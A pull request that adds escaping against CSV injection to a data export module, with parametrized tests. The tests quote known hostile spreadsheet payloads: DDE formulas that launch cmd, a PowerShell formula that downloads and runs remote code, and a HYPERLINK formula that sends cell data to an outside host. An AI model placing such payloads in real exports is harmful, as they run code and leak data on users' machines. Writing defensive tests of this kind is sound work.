### PR TITLE
Escape potentially dangerous csv outputs

### DIFF
--- a/changelog/escape_csv_output.bugfix.md
+++ b/changelog/escape_csv_output.bugfix.md
@@ -1,0 +1,1 @@
+CSV output is now escaped to protect against CSV injection: https://owasp.org/www-community/attacks/CSV_Injection

--- a/datahub/core/csv.py
+++ b/datahub/core/csv.py
@@ -1,3 +1,4 @@
+import re
 from codecs import BOM_UTF8
 from csv import DictWriter
 from datetime import datetime
@@ -45,6 +46,33 @@ def create_csv_response(rows, field_titles, filename):
     return response
 
 
+def escape(payload):
+    """
+    Escape Potentially dangerous CSV payloads.
+
+    This addresses a security issue identified here:
+        https://owasp.org/www-community/attacks/CSV_Injection
+
+    This code is adapted from https://github.com/raphaelm/defusedcsv/
+    """
+    if payload is None:
+        return ''
+
+    def starts_dangerously(value):
+        """Checks if value starts with a potentially dangerous character"""
+        return str(value)[0] in ('@', '+', '-', '=', '|', '%')
+
+    def is_number(value):
+        """Checks if value is a number"""
+        return re.match('^-?[0-9,\\.]+$', str(value))
+
+    if str(payload) and starts_dangerously(payload) and not is_number(payload):
+        payload = str(payload).replace('|', '\\|')
+        payload = "'" + payload
+
+    return payload
+
+
 def _transform_csv_row(row):
     return {key: _transform_csv_value(val) for key, val in row.items()}
 
@@ -65,4 +93,4 @@ def _transform_csv_value(value):
     if isinstance(value, Decimal):
         normalized_value = value.normalize()
         return f'{normalized_value:f}'
-    return value
+    return escape(value)

--- a/datahub/core/csv.py
+++ b/datahub/core/csv.py
@@ -74,10 +74,10 @@ def escape(payload):
 
 
 def _transform_csv_row(row):
-    return {key: _transform_csv_value(val) for key, val in row.items()}
+    return {key: transform_csv_value(val) for key, val in row.items()}
 
 
-def _transform_csv_value(value):
+def transform_csv_value(value):
     """
     Transforms values before they are written to a CSV file for better compatibility with Excel.
 

--- a/datahub/core/test/test_csv.py
+++ b/datahub/core/test/test_csv.py
@@ -6,6 +6,7 @@ import pytest
 from datahub.core.csv import (
     _transform_csv_value,
     csv_iterator,
+    escape,
     INCOMPLETE_CSV_MESSAGE,
 )
 
@@ -68,8 +69,57 @@ def test_csv_iterator_with_error():
             'HELLO',
             'HELLO',
         ),
+        # Escape potentially dangerous values
+        (
+            "=cmd|' /c calc'!'A1",
+            "'=cmd\\|' /c calc'!'A1",
+        ),
     ),
 )
 def test_transform_csv_value(value, expected_value):
     """Test transform csv value"""
     assert _transform_csv_value(value) == expected_value
+
+
+@pytest.mark.parametrize('value,expected_value', [
+    # Sample dangerous payloads
+    ('=1+1', "'=1+1"),
+    ('-1+1', "'-1+1"),
+    ('+1+1', "'+1+1"),
+    ('=1+1', "'=1+1"),
+    ('@A3', "'@A3"),
+    ('%1', "'%1"),
+    ('|1+1', "'\\|1+1"),
+    ('=1|2', "'=1\\|2"),
+    # https://blog.zsec.uk/csv-dangers-mitigations/
+    ("=cmd|' /C calc'!A0", "'=cmd\\|' /C calc'!A0"),
+    (
+        "=cmd|' /C powershell IEX(wget 0r.pe/p)'!A0",
+        "'=cmd\\|' /C powershell IEX(wget 0r.pe/p)'!A0",
+    ),
+    (
+        "@SUM(1+1)*cmd|' /C calc'!A0",
+        "'@SUM(1+1)*cmd\\|' /C calc'!A0",
+    ),
+    (
+        "@SUM(1+1)*cmd|' /C powershell IEX(wget 0r.pe/p)'!A0",
+        "'@SUM(1+1)*cmd\\|' /C powershell IEX(wget 0r.pe/p)'!A0",
+    ),
+    # https://hackerone.com/reports/72785
+    (
+        "-2+3+cmd|' /C calc'!A0",
+        "'-2+3+cmd\\|' /C calc'!A0",
+    ),
+    # https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
+    (
+        '=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for info")',
+        '\'=HYPERLINK("http://contextis.co.uk?leak="&A1&A2,"Error: please click for info")',
+    ),
+])
+def test_escape(value, expected_value):
+    """
+    Test csv escapes potentially malicious values.
+
+    Test cases taken from https://github.com/raphaelm/defusedcsv/blob/master/tests/test_escape.py
+    """
+    assert escape(value) == expected_value

--- a/datahub/core/test/test_csv.py
+++ b/datahub/core/test/test_csv.py
@@ -4,10 +4,10 @@ from decimal import Decimal
 import pytest
 
 from datahub.core.csv import (
-    _transform_csv_value,
     csv_iterator,
     escape,
     INCOMPLETE_CSV_MESSAGE,
+    transform_csv_value,
 )
 
 
@@ -78,7 +78,7 @@ def test_csv_iterator_with_error():
 )
 def test_transform_csv_value(value, expected_value):
     """Test transform csv value"""
-    assert _transform_csv_value(value) == expected_value
+    assert transform_csv_value(value) == expected_value
 
 
 @pytest.mark.parametrize('value,expected_value', [

--- a/datahub/core/test_utils.py
+++ b/datahub/core/test_utils.py
@@ -1,7 +1,6 @@
 import json
 from collections.abc import Mapping, Sequence
 from datetime import datetime
-from decimal import Decimal
 from operator import attrgetter
 from secrets import token_hex
 from unittest import mock
@@ -21,6 +20,7 @@ from rest_framework.fields import DateField, DateTimeField
 from rest_framework.test import APIClient
 from reversion.models import Revision, Version
 
+from datahub.core.csv import transform_csv_value
 from datahub.core.utils import join_truthy_strings
 from datahub.metadata.models import Team
 from datahub.oauth.cache import add_token_data_to_cache
@@ -400,20 +400,8 @@ def format_csv_data(rows):
     dictionaries with strings as values.
     """
     return [
-        {key: _format_csv_value(val) for key, val in row.items()} for row in rows
+        {key: str(transform_csv_value(val)) for key, val in row.items()} for row in rows
     ]
-
-
-def _format_csv_value(value):
-    """Converts a value to a string in the way that is expected in CSV exports."""
-    if value is None:
-        return ''
-    if isinstance(value, Decimal):
-        normalized_value = value.normalize()
-        return f'{normalized_value:f}'
-    if isinstance(value, datetime):
-        return value.strftime('%Y-%m-%d %H:%M:%S')
-    return str(value)
 
 
 def construct_mock(**props):

--- a/datahub/search/contact/test/test_views.py
+++ b/datahub/search/contact/test/test_views.py
@@ -565,7 +565,7 @@ class TestContactExportView(APITestMixin):
         reader = DictReader(StringIO(response.getvalue().decode('utf-8-sig')))
         assert reader.fieldnames == list(SearchContactExportAPIView.field_titles.values())
 
-        expected_row_data = [
+        expected_row_data = format_csv_data([
             {
                 'Name': contact.name,
                 'Job title': contact.job_title,
@@ -598,10 +598,12 @@ class TestContactExportView(APITestMixin):
                 'Created by team': get_attr_or_none(contact, 'created_by.dit_team.name'),
             }
             for contact in sorted_contacts
-        ]
+        ])
 
         actual_row_data = [dict(row) for row in reader]
-        assert actual_row_data == format_csv_data(expected_row_data)
+        assert len(actual_row_data) == len(expected_row_data)
+        for index, row in enumerate(actual_row_data):
+            assert row == expected_row_data[index]
         assert matcher.call_count == 1
         assert matcher.last_request.json() == {
             'emails': [contact.email for contact in sorted_contacts],


### PR DESCRIPTION
### Description of change

Escapes potentially dangerous csv outputs (see https://owasp.org/www-community/attacks/CSV_Injection).

Previously, downloading data could expose an Excel-based security issue - this fixes that by appending a single quote before potentially dangerous cell values and escaping the pipe character.

### Checklist

* [ ] If this is a releasable change, has a news fragment been added?

  <details>
  <summary>Explanation</summary>
  
  A news fragment is required for any releasable change (i.e. code that runs in or affects production) so that a corresponding changelog entry is added when releasing.
  
  Check [changelog/README.md](https://github.com/uktrade/data-hub-api/blob/master/changelog/README.md) for instructions.
  
  </details>
  
* [ ] Has this branch been rebased on top of the current `develop` branch?

  <details>
  <summary>Explanation</summary>
  
  The branch should not be stale or have conflicts at the time reviews are requested.
  
  </details>

* [ ] Is the CircleCI build passing?

### General points

<details>
<summary><strong>Other things to check</strong></summary><p></p>

* Make sure `fixtures/test_data.yaml` is maintained when updating models
* Consider the admin site when making changes to models
* Use select-/prefetch-related field lists in views and search apps, and update them when fields are added
* Make sure the README is updated e.g. when adding new environment variables

</details>

See [docs/CONTRIBUTING.md](https://github.com/uktrade/data-hub-api/blob/develop/docs/CONTRIBUTING.md) for more guidelines.
